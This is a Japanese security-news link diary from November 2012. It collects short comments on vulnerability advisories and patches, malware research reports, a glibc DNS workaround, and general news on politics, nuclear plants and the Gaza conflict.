JVNDB-2012-005433: libvirt の virNetServerProgramDispatchCall 関数におけるサービス運用妨害 (DoS) の脆弱性 (JVN, 2012.11.19)。 libvirt 0.10.2 (2012.09.24) で修正されている。CVE-2012-4423
》 「宇宙戦艦ヤマト2199」が工事現場の透明性と安全性を向上 (前田建設, 11/9)。工法説明看板、説得力ありすぎ。通常看板マジ欲しい。
》 税金10億投入した鳥取「国際まんが博」の悲惨すぎる内容 (NAVER まとめ, 11/19) (魚拓 page1、page2)。そして誰もいなくなった。
》 Microsoftが廃水をエネルギーに変える発電所とデータセンターを統合させた施設を開発中 (gigazine, 11/22)。複合施設ですか。スケールがどんどんデカくなるな……。
》 のび太は「勢力」ではなく「脅威」を均衡する (海国防衛ジャーナル, 11/16)、 ドラえもんとの同盟はのび太の成長にマイナス? (海国防衛ジャーナル, 11/16)。のび太ねたつづき。
》 アメリカの戦術核は減り続けています (海国防衛ジャーナル, 11/21)。橋下市長ねたつづき。
関連: 維新3次公認候補に国民的美魔女も… 吉本芸人は4次、5次候補の可能性 (産経, 11/22)。イロモノ政党……。
》 「なぜ無線通信で用いられる周波数帯域は2.4GHzなのか」調査中の学生の前に立ちはだかった最後の巨大な壁 (gigazine, 11/22)
》 原発直下に活断層? 問われる国の判断 (NHK クローズアップ現代, 11/21)。大飯原発の件。先日のかんさい熱視線 11/17 「揺れる大飯原発 活断層調査のゆくえ」とほぼ同じ内容だったみたい。かんさい熱視線は再放送あります。
》 マイクロソフト、上半期の脅威を報告〜アプリケーションの脆弱性解消を (so-net セキュリティ通信, 11/22)。SIR 13。
》 SNSに潜む危険を防ぐ「SNSを安全に歩くための10項目」を提案(JNSA) (so-net セキュリティ通信, 11/21)
》 If security wants your password: Privacy for travelers with digital devices (ZDNet, 11/20)
》 フィッシング対策セミナー2012開催のご案内 (フィッシング対策協議会)。2012.12.14、東京都品川区、無料。 「金融機関のフィッシング対策について(仮)」「dkim.jpの取り組みについて(仮)」「不正アクセス禁止法改正と警察の取り組みについて(仮)」「国内及び海外のフィッシングの現状について(仮)」だそうです。
》 HTTP Strict Transport Security becomes Internet Standard (H Security, 11/21)。 RFC 6797: HTTP Strict Transport Security (HSTS) (IETF)
》 AT&TからiPadユーザー11万人の個人情報が漏洩した事件でハッカーに有罪判決、電子フロンティア財団からは憂慮の声 (gigazine, 11/21)
》 Windows 8はまだ早いというユーザーのための「ダウングレード講座」【後編】 (ComputerWorld.jp, 11/22)
Q. Windows 8 ProプリインストールPCを購入しました。Windows XPにダウングレードすることはできますか?
A. できません。Windows 8 Proのダウングレード権で使用できるのは、同一言語版のWindows 7 ProfessionalまたはWindows Vista Businessです(前編参照)。
Q. Windows 8(無印)プリインストールPCを購入しました。Windows 7にダウングレードすることはできますか?
A. できません。ダウングレード権は、OEM版のWindows 8 Proに付帯する権利です(前編参照)。
イスラエルとハマスが停戦合意 戦闘8日目、地上戦回避 (共同, 11/22)
ハマス幹部「歴史的勝利」、停戦合意でガザ市民数万人が歓喜 (ロイター, 11/22)
ガザ停戦 (中東の窓, 11/22)
ガザ情勢(情報戦争) (中東の窓, 11/22)
Twitterでガザ攻撃の様子を追うときに、注意が必要な1つのポイント(3ページが重要) (NAVER まとめ, 11/21) (魚拓 page1、 page2、 page3、 page4)
》 2012年11月 『児童ポルノ排除対策 公開シンポジウム』に行ってきました。 (LOVE&PEACE, 11/21)
》 シンドラー事故公判開けず3年…異例の鑑定合戦 (読売, 11/22)。なんと、そんなことになっていたのか。
同手続きは非公開だが、関係者によると、検察側はエレベーター部品の鑑定結果を基に、元保守部長らが点検の際にブレーキパッドの極端な摩耗を見落としたことが事故につながったと主張。これに対し、無罪を主張する弁護側も独自にブレーキパッドの実験を行い、「点検時に極端な摩耗はなかった」と反論し、鑑定の内容や立証趣旨を巡る争いが続いているという。
昨年6月には、検察側が「鑑定の前提事実に誤りがあった」として鑑定書を撤回。弁護側は「重大なミスで、起訴を取り下げるべきだ」と主張したが、検察側が鑑定をやり直し、さらに時間を費やした。
》 趣味のインターネット地図ウォッチ 第149回:日本全国の地質や活断層の位置が分かる「地質図Navi」 ほか (Internet Watch, 11/22)
》 来年16Tbitで運用開始、アジア各国を結ぶ光海底ケーブル「SJC」陸揚げレポート (Internet Watch, 11/22)
》 山谷剛史のマンスリー・チャイナネット事件簿 フォーブス中国富豪ランキング、百度と騰訊からベスト10入り ほか 〜2012年10月 (Internet Watch, 11/21)
》 遠隔操作ウイルス発見サービス (NetAgent, 11/20)
》 Windows 8 セキュリティ特集 #4 セキュア ブート (日本のセキュリティチーム, 11/22)
》 剛力彩芽の月9主演に「ゴリ押し最悪」「絶対見ない」の批判殺到!! (サイゾー / 読めるモ, 11/21)。「ビブリア古書堂の事件手帖」実写ドラマ化の主演女優の件。
「栞子さんは文庫本のビジュアルイメージでは黒髪ストレートのロングヘアで、地味な印象の薄幸美人。本に関して並外れた知識を持ち、第1巻では大怪我を負い病院に入院中ながら、語り部の青年が集めた情報を元に冷静な判断で事件を解いてしまう“安楽椅子探偵”です。小説内の描写では体型はスレンダー巨乳、年齢も20代後半で、剛力彩芽という女優のイメージからはあまりにかけ離れています。彼女の妹役ならば元気で快活なイメージの剛力さんがピッタリですが、いくらなんでもミスキャスト。通常ならば映像化作品はさらに売り上げを伸ばしますが、今回のドラマ化では逆にファン離れも考えられますね」(都内書店員)
だよなぁ……。good! アフタヌーンの漫画版はいい感じ (原作表紙よりもいい感じ) なのに、どうしてこうなった……。 ちなみにコミック 1 巻は12月21日発売だそうで。
関連:
<剛力彩芽>異例の早さで月9主演に抜てき 「本当に私でいいの?」 (まんたんウェブ / Yahoo, 11/21)。ダメ、ゼッタイ。
集え黒歴史!『 #これに比べたら剛力彩芽ごとき 』まとめ (NAVER まとめ, 11/22)
【声優】池澤春菜さん、Twitter「しばらく沈黙します」と宣言— 理由は怒られたから? (2ch.net, 11/22)
》 スマホ情報流出で逮捕の5人を釈放、東京地検 (弁護士 落合洋司 (東京弁護士会) の 「日々是好日」, 11/21)。落合弁護士のコメント。
》 AWSクラウドで耐障害性を高める3つのTips フォールト・トレラントなアーキテクチャやアプリケーションの設計とサードパーティ製品活用 (ComputerWorld.jp, 11/21)
》 Windows 8 Pro海賊版のアクティベーションを永久に有効にする方法をユーザーが報告 「期間限定で無料配布中のWindows 8 Media Center Packにアップグレードすればよい」と説明 (ComputerWorld.jp, 11/22)。わかりやすい手法だなあ。
》 JSSEC、「スマートフォンセキュリティシンポジウム 2012」を開催 BYOD運用の理想は「舵取り型」、最悪なのは「忍び型」 (ComputerWorld.jp, 11/22)
》 米ITC、アップル対サムスン特許訴訟の仮決定を調査へ 標準必須特許を巡る多様な問題を検討へ (ComputerWorld.jp, 11/21)
》 万が一の事態に備えて飛行機の客室乗務員が受けるめちゃくちゃ本格的な緊急脱出訓練をJAL(日本航空)施設で体験してみた (gigazine, 11/20)。プレス向けに公開したようで。
》 ”クレーム騒動”話題のさかもと未明、機内での違反行為について謝罪……警察に出頭していた (RBB Today / Yahoo, 11/22)。前ねた。どこまでもオレオレな方なようで。
》 An analysis of Dorkbot’s infection vectors (part 2) (Microsoft Malware Protection Center, 11/21)
》 オンライン銀行を狙う不正プログラム「Gozi-Prinimalka」による一連の攻撃調査報告 (トレンドマイクロ セキュリティ blog, 11/21)
》 InternetWeek 2012 D2「DNS DAY」 (togetter, 11/21)
》 options single-request-reopen ( /etc/resolv.conf ) (ぷろじぇくとMIKS, 8/4)、RHEL6/CentOS6では、single-request-reopen を必須にしたい… (kunitake.org, 11/2)。IPv6 + コワレ Firewall + CentOS 6 話。 とりあえず /etc/resolv.conf に options single-request-reopen と書いておくのが吉のようです。
どうやらこういうことみたい:
glibc 2.9 で v4/v6 並列リクエストが実装された。しかしコワレ Firewall で問題が出る
glibc 2.10 で問題回避のためのオプション single-request が実装された
glibc 2.11 で問題回避のための 2 つ目のオプション single-request-reopen が実装された
CentOS 5 は glibc 2.5、CentOS 6 は glibc 2.12 です。関連:
glibc 2.10 news (Ulrich Drepper, 2009.04.17)
Add “single-request” to the options in /etc/resolv.conf. This selects the compatibility mode from the start.
glibc 2.11 (libc-alpha@sourceware.org ML, 2009.10.30)
Implement second fallback mode for optimized DNS lookup for even more broken environments. If two requests from the same port are not handled correctly close the socket and open a new one before sending the second request. The 'single-request-reopen' option in /etc/resolv.conf can be used to select this mode right away, instead of rediscovering the necessity is every process again.
Implemented by Ulrich Drepper.
glibc-2.9 changelog (upstream-tracker.org)
glibc-2.10.1 changelog (upstream-tracker.org)
glibc-2.11.1 changelog (upstream-tracker.org)
さくらの VPS: OSセットアップ情報 (さくらインターネット)
CGI.pm 3.62 以前に欠陥、Set-Cookie または P3P ヘッダにおける CR のエスケープ処理が正常になされていないため、ヘッダインジェクション攻撃が可能。 CVE-2012-5526
CGI.pm 3.63 で修正されている。
Opera 12.11 公開されました。2 件のセキュリティ欠陥が修正されています。 iida さん情報ありがとうございます。
出ました。セキュリティ修正含みます。
リリースノート: Firefox 17.0 / 10.0.11 ESR、 Android 版 Firefox 17.0、 Thunderbird 17.0 / 10.0.11 ESR、 SeaMonkey 2.14
セキュリティアドバイザリ: Firefox / Firefox ESR、 Thunderbird / Thunderbird ESR、 SeaMonkey
ダウンロード:Firefox、 Thunderbird、 Firefox / Thunderbird ESR、 SeaMonkey
新しい Social API に対応し、Facebook を試験的に統合した最新版の Firefox を公開しました (Mozilla Japan ブログ, 2012.11.21)。Mac OS X 10.5 では動きません、 Firefox 10 ESR は次回で終了、その後は Firefox 17 ESR。
また Firefox 17 では iframe の sandbox 属性をサポートするそうで。
Firefox 17.0.1 が公開されています。リリースノート。「脆弱性の知られているプラグインに対しては Click to Play 機能が有効になり、ユーザがクリックするまで読み込まれなくなります。詳細はこちらのブログ記事をご覧ください」だそうです。
アドバイザリがたびたび改訂されてます。また対応・回避策が SYM12-017 シマンテックの旧バージョンの Decomposer (圧縮解凍エンジン) に CAB ファイルの問題についてにまとめられています。らのゆきさん情報ありがとうございます。対応・回避策:
SEP 12.1 にアップグレードする
SEP 11.0 RU5 〜 11.0.7 MP3 にアップグレードし、 SYM12_017_Fixtool.exe を適用する。 SYM12-017 シマンテックの旧バージョンの Decomposer (圧縮解凍エンジン) に CAB ファイルの問題について から入手できる。
CAB ファイルのスキャンが無効になるよう設定する。 SYM12-017 シマンテックの旧バージョンの Decomposer (圧縮解凍エンジン) に CAB ファイルの問題について から入手できる。
》 NTPサーバの一部が2000年に逆戻りしてしまう事態が発生 (gigazine, 11/21)、USNO NTP Network Time Servers (navy.mil)
USNO NTP FAILURE -- 19 NOV 2012
On Monday, November 19, USNO made what was expected to be a routine upgrade. Unfortunately, for 51 minutes, between 21:07:32 - 21:58:56 UTC, the server gave out the year as 2000 instead of 2012. We have resolved the issue that caused this error.
We regret the disruptions that this may have caused. We strongly recommend that all NTP users configure their software to get time from three different sources at a minimum. Most software should be able to use the redundant data to identify and ignore incorrect time sources. You can find a list of other time sources at http://support.ntp.org/bin/view/Servers/WebHome.
》 タリバンがBCCをCCでメール、送信先の400名が明らかに (WIRED / 産経, 11/20)。あらあら、うふふ。
》 <日本卓球の至宝、覚悟の告発> 水谷隼 「世界の卓球界を覆う違法行為を僕は決して許さない」 (NUMBER, 11/20)
「体に無害なら、ルールを改正して補助剤の使用を認めてもいいのではないか」という意見も耳にします。「日本選手も使えば、フェアになる」と。でも、後加工を認めると、卓球はどんどん用具偏重の特異な競技になってしまいます。それに、もし今から補助剤が認められたら、僕は卓球をやめるでしょう。誠実にルールを守りながら、技術を磨いてきたこの4年間、19歳から23歳までの日々が無駄になるからです。
》 キャンディーズ「春一番」がカラオケから抹殺されていた (アサ芸プラス / livedoor, 11/13)。著作権ねた。
》 完全に差が出てきたDeNAとグリーの売上推移 (山口利昭 / BLOGOS, 11/15)
》 内部統制の運用に問題があると「重過失」リスクが生じる件−ファーストサーバ事件 (山口利昭 / BLOGOS, 11/14)
》 “アプリで流出” 処分保留で釈放 (NHK, 11/20)。the Movie の件、スマホ:情報流出アプリで5人逮捕…ウイルス供用容疑 (毎日, 10/30) のつづき。
》 スマホ情報流出:400万件 ウイルス作成容疑で2人逮捕 (毎日, 11/20)。電池長持ちの件。スマホウイルス:保管容疑で28歳会社員逮捕…京都府警 (毎日, 10/30) のつづき。
府警は、このウイルスを作成したなどとして、新たに東京都内の男2人について (中略) 逮捕した。
》 焦点:中東の政治バランス変化、イスラエルのガザでの行動制約 (ロイター, 11/20)
》 アプリによるバッテリー消費の実状 〜国内スマホアプリの実態:第3弾〜 (トレンドマイクロ セキュリティ blog, 11/19)
陸山会事件の構図自体を否定した控訴審判決とマスコミ・指定弁護士・小沢氏の対応 (郷原信郎 / BLOGOS, 11/14)
今回の控訴審判決では、検察と指定弁護士が事件の核心であると考えた、4億円をめぐる偽装・隠蔽そのものを否定したところに重大な意味がある。
秘書事件の一審判決(登石判決)は、4億円の虚偽記入とは全く関連性がないにもかかわらず、水谷建設からの裏献金についての検察官立証を認め、証拠に基づかない推認に推認を重ねて4億円の銀行借入れと定期預金設定が、水谷建設からの裏献金と小沢氏からの現金4億円を隠蔽する目的であったと認定した。しかし、小沢氏の一審、二審で偽装・隠蔽の目的自体が否定された。その判断を前提にすると、登石判決における水谷建設の裏献金の認定は、完全に宙に浮いてしまうことになる。今回の小沢事件の控訴審判決が、同じ東京高裁で本日から始まる秘書事件の控訴審に大きな影響を与えることは必至だ。
小沢代表の無罪確定 指定弁護士、上告を断念 陸山会事件 (東京, 11/19)
小沢代表無罪確定 強制起訴では初 (弁護士 落合洋司 (東京弁護士会) の 「日々是好日」, 11/19)
》 セキュリティ インテリジェンス レポート (SIR) 第 13 版 〜 特集「ダウンロード詐欺」 (日本のセキュリティチーム, 11/20)
》 証言 班目春樹 原子力安全委員会は何を間違えたのか? (新潮社)
ノロウイルスなど感染性胃腸炎増加 注意を (NHK「かぶん」ブログ, 11/18)
ノロウイルス食中毒注意報の発令について (滋賀県, 11/12)。発令中。
》 Connectusers.com データベースの侵害 (Adobe, 11/20)。 ハッカーがAdobeから顧客情報やパスワードなど15万件を盗んだことを公開 の件かな……。
》 東日本大震災:福島第1原発事故 健康調査検討委、内部被ばく議論を当初削除 公開後に議事録追加 (毎日, 11/20)。福島県はこんなのばっかだな……。
東京電力福島第1原発事故を受け福島県が実施している県民健康管理調査の検討委員会を巡る一連の問題で、県は19日、情報公開請求後に一部の議論を削除して公開した検討委の議事録を修正し改めて請求者に開示した。内部被ばくの検査で精度が高いとされる尿検査の実施を国側から提案されながら県側が難色を示すやりとりが追加された。修正前の議事録に全くなく、専門家は「被害を低く評価するため(少しの内部被ばくでも検出する)尿検査をやりたくないとの本音を見せたくなかったからでは」と批判している。
関連: 【特報】 福島県 子どもの放射能 尿検査せず 秘密裏に「困難」結論? (東京, 10/25)
》 東電 未公表データをHPで公表 (NHK「かぶん」ブログ, 11/20)。2F の未公表データ の件。公開されました: 福島第二原子力発電所モニタリングポスト計測値の当社ホームページ掲載状態について (東電, 11/19)
》 FPS-7レーダーの探知能力は430km以上? (アシナガバチの巣作り日記, 11/20)
維新の会と太陽の党合流 「脱原発」の文字消える (東京, 11/18)
維新の会:減税日本と合流 橋下氏「減税は小異じゃない」 (毎日, 11/19)。脱原発は小異だった模様。 大飯原発再稼働のときに証明済みでしたから、「やっぱりねー」ですが。
維新・太陽合流から一夜 批判集中 (東京, 11/19)。 どう見ても野合ですからねえ。
維新:企業献金禁止を撤回 旧「太陽」に譲歩、目玉骨抜き (毎日, 11/20)。企業献金禁止も小異だった模様。
橋下氏は9月、企業・団体献金の全面禁止に関し、「維新の会の特徴の一つ。絶対に自民党や民主党ではできない。今までの政治と決別するという意味で譲れない線だ」と表明。党規約にも明記し、賛同しない議員の維新加入を認めない考えを示していた。
コロコロ変わりすぎだろ……。これではカオナシだ。
10分喫茶店に寄った大阪市職員は懲戒処分なのに、平日でも選挙運動する橋下市長と職務専念義務の関係 (Everyone says I love you !, 11/16)。俺様ルールですか……。
》 New 64-bit Linux Rootkit Doing iFrame Injections (Kaspersky, 11/19)、 A New Linux Rootkit (F-Secure blog, 11/20)、 Linuxを標的にした謎のドライブ・バイ攻撃用ルートキットが登場 Debian Squeezeのみが対象の新たなiframeインジェクション攻撃 (ComputerWorld.jp, 11/22)
》 Windows 8 を標的にして Google Docs を悪用するマルウェア (シマンテック, 11/20)。Google Docs を介して、Office 文書を使って通信!
》 iPS網膜を患者に移植 臨床研究承認 (NHK「かぶん」ブログ, 11/20)。いよいよ。
》 Beware Card- and Cash-Trapping at the ATM (Kerbs on Security, 11/20)。こんなツールがあるんですね。
》 LideoがKindleと戦うために、やらなくてはいけないこと (More Access,More Fun!, 11/20)
思うに、日本の電子書店には「集客」という意識が根本的に欠けていると思う。まさしく砂漠に書店を作っているようなもの。検索上位はすべてAmazonに取られ、ブロガーに誘導を協力してもらう機能も無い。これで売れるほうが不思議。Lideoにしても、いくらNECがKindleより全てのスペックに勝るものを作り、BookLive書店にAmazonより多くの日本の書籍を集めても、誰も知らないんだから売れるはずがない。
》 ハリケーンの影響で水没したマンハッタンの地下ケーブル復旧作業 (gigazine, 11/20)
》 Facebook finally enables HTTPS by default, we give away free T-shirts to celebrate (Sophos, 11/19)。Facebook で https がデフォルトになったそうで。
》 さかもと未明女史、飛行機中で赤ちゃんに泣かれて逮捕寸前のクレームを起こす (やまもといちろう Blog, 11/20)。当該の人、どうして自分の耳を塞がないんだろう。耳栓くらいあらかじめ買っておこうよ。 高々数百円だよ。 もちろんノイズキャンセリングヘッドフォンとかでもいいし。 他人にどうこう言う前に自衛しようよ。 正直、赤ちゃんよりもクレーマーの方がよっぽどウザイよ。
》 モバイル端末からの個人情報漏えいに注意 (so-net セキュリティ通信, 11/19)、 「モバイル端末も乗っ取られる可能性がある」——マカフィーのモバイル開発担当幹部が警鐘 端末から個人情報が漏れないようにするためには…。 (ComputerWorld.jp, 11/20)
》 Exploit Packs and the Secret Decoder Ring (Kahu Security, 11/17)
》 NICOSパスワード8文字切り詰め制限祭りまとめ (togetter, 11/20)
》 ModSecurity 2.7.1 が出ています。
》 トレンドマイクロが制御システムセキュリティに進出 - OEM提供や海外進出も (マイナビニュース, 11/19)。商売商売。
》 Wii U Miiverse、さっそくハクられた模様。 しかも「偶然」って……。
Nintendo fixes Wii U network after claims of accidental hack (Sophos, 11/19)。輝く DEBUG の文字。
Nintendo Wii U network 'hacked' hours after launch? (ZDNet, 11/19)
「Wii U」ユーザーがMiiverseをハッキング? 任天堂が対処 (ITmedia, 11/20)
IIS 上の ColdFusion 10 Update 1 以降に DoS 攻撃を受ける欠陥。ColdFusion 10 Update 5 で修正されている。 Priority Rating: 2。CVE-2012-5674
》 人知れず2m縮んだ東京・大手町の超高層 (日経 KEN-Plats, 11/5)。「りそな・マルハビル」。
》 もんじゅ元所長“ミスタープルトニウム”が語る原発推進論 (Biz誠, 11/15)
》 大飯原発 活断層調査チーム 岡田篤正「性急な判断求められた」の問題点 (ざまあみやがれい!, 11/19)。稼働中だからこそ「性急な判断求められた」のであろ。 明確にシロだと判断できなければ潜在クロと看倣して、まずは止めればいいだけ。
》 Opera's web portal reportedly deployed online banking trojan (H Security, 11/16)
》 価格破壊という「誤解」を解きたい アマゾンジャパン (日経, 11/19) ということにしたいのですね。 関連: キンドルが売れないこれだけの理由 (東洋経済オンライン / Yahoo, 11/15)
》 未公表データが存在 放射線量が急上昇 (NHK「かぶん」ブログ, 11/17)、 関連)去年3月16日「第二原発周辺」の放射線量 (NHK「かぶん」ブログ, 11/17)。
福島第一原発の事故で放出された放射性物質については、東京電力がことし5月に最新の解析結果を公表し、去年3月15日に2号機から翌16日には3号機から、大量に放出されたとしていますが、具体的な放出経路などは明らかになっていません。
この未解明の謎に迫ろうと、NHKが原発周辺で観測された放射線量について改めて調べたところ、第一原発から南に12キロにある第二原発の値に不自然な点があり、問い合わせた結果、未公表のデータの存在が分かりました。
東電、あまり変化がなかったかのように公表範囲をゴマカシていたが、 NHK 取材班にバレた。 いまだにこんなレベルの情報隠しをやっていたとは。
去年3月16日午前10時前後に放射線量が急上昇したのは、第二原発3号機の真西に設置された仮設のモニタリングポストです。
》 敦賀原発 断層調査(会社側)結果は来年1月 (NHK「かぶん」ブログ, 11/17)
》 「ネットの自由」vs.著作権 (壇弁護士の事務室, 11/19)
》 New Xtreme RAT Attacks on US, Israel, and Other Foreign Governments (trendmicro blog, 11/14)
》 コンゴ民主共和国方面。反政府勢力 M23 対政府・国連 PKO 部隊。
コンゴ反政府勢力が侵攻、主要都市に迫る 安保理が非難声明 (CNN, 11/19)
反政府勢力が攻勢=国連部隊が攻撃−コンゴ東部 (時事, 11/19)
コンゴ、反政府組織が大都市制圧 大量の難民出る恐れ (朝日, 11/20)
コンゴ:反政府勢力が侵攻 隣国ルワンダ軍事支援 (毎日, 11/20)
M23 はルワンダから支援されているようで。
国連報告書:コンゴ東部に新しく設立された武装勢力M23を、ルワンダ政府が支援 (コンゴとアフリカを考える, 7/3)
コンゴ民主共和国:国連は、北キヴの市民を保護すべき (アムネスティ, 7/22)
》 セキュリティ インテリジェンス レポート (SIR) 第 13 版概要 (日本のセキュリティチーム, 11/18)
》 2012年上半期、各国政府によるコンテンツ削除要請が急増——グーグル 名誉毀損、ポルノ、差別発言などの削除要請件数は昨年比88%の増加。ユーザー情報提出要請も33%増 (ComputerWorld.jp, 11/17)
》 ネット検索で名誉毀損、豪裁判所がグーグルに賠償命令 (AFPBB, 11/14)
グーグル側は、他者が公開した情報を知らずに広めてしまっていただけで、同社がその情報を公開したのではないと主張。さらに、Trkuljaさんが問題とした情報についても名誉毀損には当たらないとしていた。
だが、Trkuljaさんの弁護士が2009年10月に、グーグルに対し「著しい名誉毀損」を含むコンテンツへの対処を書面で要求していたことから、陪審団は原告の訴えを認め、グーグル側はこの問題を認識していたのにもかかわらず行動を起こさなかったと結論した。
知っていたのに放置したので名誉毀損成立という、ある意味あたりまえの判決。
》 サイバー攻撃のこれからを考える夕べ (IW2012)。Internet Week 2012 BoF。今夜。
例によって BoF 参加資格を誤解している人がいるようだが、今年の「BoF開催のための注意事項」にはこう書いてある。
BoF開催のための注意事項
(中略)
4. 一般参加者の受付は開催者自身でお願いします。用意する部屋の上限を超えた場合は、立ち見になる場合があります。(机・椅子の追加はできません)。
5. BoF一般参加資格者は、原則的にはInternet WeekのBoF以外のプログラムに一つでも登録している方とさせていただきます。
日本語に訳すと、IW 事務局としては登録者じゃなきゃ絶対に駄目だとは言わないから、BoF 開催者がよしなに判断しろということ。絶対駄目って書いちゃえば楽なのにそうしていない理由を考えよう。だから、問いあわせるなら IW 事務局ではなく BoF 開催者だよ。BoF 開催者自身が行っている案内がどこかにあるのなら、それに従えばいい。
……ということくらいは、BoF 開催者は考えて案内しているだろうと思うけど。
》 ヤマダ、ヨドバシなど「Kindle」販売見送り 顧客流出を懸念 (SankeiBiz / ITmedia, 11/19)。×ヤマダ、エディオン、ヨドバシ ○ケーズ、ビック
》 「75Mbps・東名阪カバー率99%」は誇大広告——イー・アクセスに消費者庁が措置命令 (ITmedia, 11/19)
【ナブルス通信】「ガザで殺人を行っているのは誰か」ーーノーム・チョムスキーらによる報道への呼びかけ (P-navi info, 11/17)
ガザ地区:イスラエル軍の攻撃で19人死亡 反撃も激化 (毎日, 11/16)
ガザ地区:ロケット弾を発射 「抗戦」叫ぶ男たち (毎日, 11/16)
ガザ地区:「娘も家も失った」 武力の応酬、傷つく市民 (毎日, 11/16)
イスラエル:テルアビブ、響くサイレンに衝撃 ガザからロケット弾飛来 (毎日, 11/18)
イスラエル:ガザへ大規模空爆 200カ所破壊、地上侵攻の可能性 (毎日, 11/18)
ガザ地区:イスラエル軍が攻撃継続 地上戦突入の可能性 (毎日, 11/18)
ガザ地区:米大統領 イスラエル軍の攻撃を支持 (毎日, 11/18)。いつもどおり。
イスラエルの空爆による犠牲者72人に、エジプトが停戦へ働きかけ (ロイター, 11/19)
生々しいですが、今イスラエルがガザを攻撃しているということはこれです!!! pic.twitter.com/ejXfRhm3 (@MayShigenobu 重信メイ (May Shigenobu), 11/19)。子供の血まみれ遺体写真。
クローズアップ2012:イスラエルとの戦闘激化 強気のハマス (毎日, 11/19)
「ウーウー……」。地中海に臨むイスラエル最大の商業都市テルアビブに18日午前10時半、うなるようなサイレン音が低く高く響き渡った。ハマス支配下のガザ地区から発射されたロケット弾の飛来を知らせる空襲警報だ。イスラエル軍によりロケット弾は空中で撃破されたが、飛散した破片が住宅地の車を直撃。運転手は炎に包まれた車から、間一髪で脱出した。
ガザからテルアビブまでは約70キロ。かつて届いたことのないロケット弾がイスラエルの心臓部に連日飛来するようになった現実こそが、イスラエル軍の大規模ガザ攻撃を招いた最大要因だ。
【拡散希望】ガザの虐殺、この現実を見て! (DAYSから視る日々, 11/19)。現場映像。
Iron Dome malfunction led to three deaths in Kiryat Malakhi (haaretz, 11/19)。先週木曜日にハマスのロケット弾が着弾してイスラエル市民 3 名が死亡したのは、 Iron Dome 防空システムのバッテリーが一時的に故障していたから。
イスラエル:ガザ空爆、子供ら77人犠牲 なぜ標的に イスラエルへ憎悪膨らませ (毎日, 11/19)、 ガザ地区:イスラエルの空爆、子供も犠牲…誤爆の可能性も (毎日, 11/19)
Anonymous takes on Israeli websites, wipes Jerusalem bank (ZDNet, 11/16)、 イスラエルへのサイバー攻撃急増、空爆開始から4400万回 (ロイター, 11/19)
》 正規ユーザを泥棒呼ばわり iOSアプリの海賊版対策として仕込んだ懺悔ツイート機能が暴走 (I believe in technology, 11/15)。 エヌフォーの辞書アプリの件、 Twitter 誤爆だけではなく local 端末でポップアップもするのですか。
カスタマーレビューによると、アプリ上では「I am a software thief!!」(私はソフトウェア泥棒だ!!)というポップアップまで表示されるようだ。
正規のユーザにしてみれば、きちんとお金を支払い購入したアプリなのに、泥棒扱いされただけでなく、「自分は泥棒である」と世界に向けてツイートされてしまうのだから、たまったものではない。
》 尖閣、中国主張の矛盾追及 「70年代まで触れず」と政府 (共同, 10/4)。実際そうだからなあ。
》 FreeBSD.org、不正侵入を受ける (slashdot.jp, 11/18)、FreeBSD.org intrusion announced November 17th 2012 (FreeBSD)。FreeBSD の OS そのもの、および OS に付随するパッケージについては影響を受けないことを保障するが、2012.09.19〜2012.11.11 の ports からコンパイルされたモノについては保障の限りではない模様。 うひー。
》 災害情報伝達はあらゆる手段で (NHK, 11/16)、 KDDIなどが緊急速報メールとエリアワンセグの連携、石巻市で実証試験 (日経 IT Pro, 11/15)。「耐災害性の強い放送系技術を用いた防災システムの研究開発」。
今回の新システムの最大の特長は、「1回の入力作業で情報を多様な伝達手段に一斉に配信できる」という点です。
通常は、緊急速報メール、防災無線向けの音声など、複数の伝達手段ごとにそれぞれ情報を入力する必要がありますが、この新システムでは1回入力すれば自動的にさまざまな手段で情報を送れます。
関連:
「多様な通信・放送手段を連携させた多層的な災害情報伝達システムの研究開発」フィールド実証実験を開始 (NTT データ, 11/9)
ホワイトスペース※1を活用した研究開発 耐災害性の強い防災システムの実証試験を実施 放送系技術を利用した災害情報伝達システムの確立を目指します! (マスプロ電工, 11/12)
〈お知らせ〉 緊急速報メールとエリア放送を連携させる研究開発への協力について (KDDI, 11/15)
[SA51097] KDE kdelibs Multiple Vulnerabilities (secunia, 2012.10.31)。KDE 4.x。 CVE-2012-4512 CVE-2012-4513 CVE-2012-4514 CVE-2012-4515
CVE-2012-4233 Multiple file format denial of service vulnerabilities (LibreOffice, 2012.10.31)。LibreOffice 3.5.7 / 3.6.1 で修正されている。 関連:
VMSA-2012-0016: VMware security updates for vSphere API and ESX Service Console (VMware, 2012.11.15)。ESXi 4.1、ESX 4.1 に影響。patch が用意されている。 CVE-2012-5703 CVE-2012-1033 CVE-2012-1667 CVE-2012-3817 CVE-2011-4940 CVE-2011-4944 CVE-2012-1150 CVE-2012-0876 CVE-2012-1148 CVE-2012-0441
Security releases issued: Django 1.3.4 and Django 1.4.2 (djangoproject.com, 2012.10.17)。 Host header poisoning 可能な欠陥が修正されている。CVE-2012-4520
Apache Tomcat 7.0.30 / 6.0.36 / 5.5.36 で DIGEST 認証が修正された件の詳細が 2012.11.05 付で公開されている。
Fixed in Apache Tomcat 7.0.30 (apache.org)
Three weaknesses in Tomcat's implementation of DIGEST authentication were identified and resolved:
- Tomcat tracked client rather than server nonces and nonce count.
- When a session ID was present, authentication was bypassed.
- The user name and password were not checked before when indicating that a nonce was stale.
Fixed in Apache Tomcat 6.0.36 (apache.org)
Fixed in Apache Tomcat 5.5.36 (apache.org)
apache のには CVE-2012-3439 と書かれてるけど、別途 CVE-2012-5885 CVE-2012-5886 CVE-2012-5887 が割りあてられたみたい。
TYPO3-CORE-SA-2012-005: Several Vulnerabilities in TYPO3 Core (typo3, 2012.11.08)。4.5.21 / 4.6.14 / 4.7.6 で修正されている。
Bugzilla 4.3.3, 4.2.3, 4.0.8, and 3.6.11 Security Advisory (Bugzilla, 2012.11.13)。 CVE-2012-4199 CVE-2012-4198 CVE-2012-4189 CVE-2012-4197 CVE-2012-5475
》 2ちゃんねるまとめサイトが一斉謝罪 広告料・代理店名など「カモフラージュ広告」の実態明らかに (ねとらぼ, 11/10)。そういうことだったのか。
台湾
尖閣諸島:台湾漁船の領海侵入、馬総統が称賛 (毎日, 11/9)
台湾軍が尖閣上陸を企図、李登輝総統の「一喝」で中止…1990年 (サーチナ, 11/9)
尖閣漁業権巡り台湾訪問 沖縄・石垣市の代表団 (日経, 11/13)
台湾企業が「反日」で便乗 勝者なき不買運動 上海支局 菅原透 (日経, 11/15)
中国
26日連続、尖閣に中国船 3カ国語で「自国海域」 (産経, 11/14)。永遠に続くと思った方がよいだろうなあ。
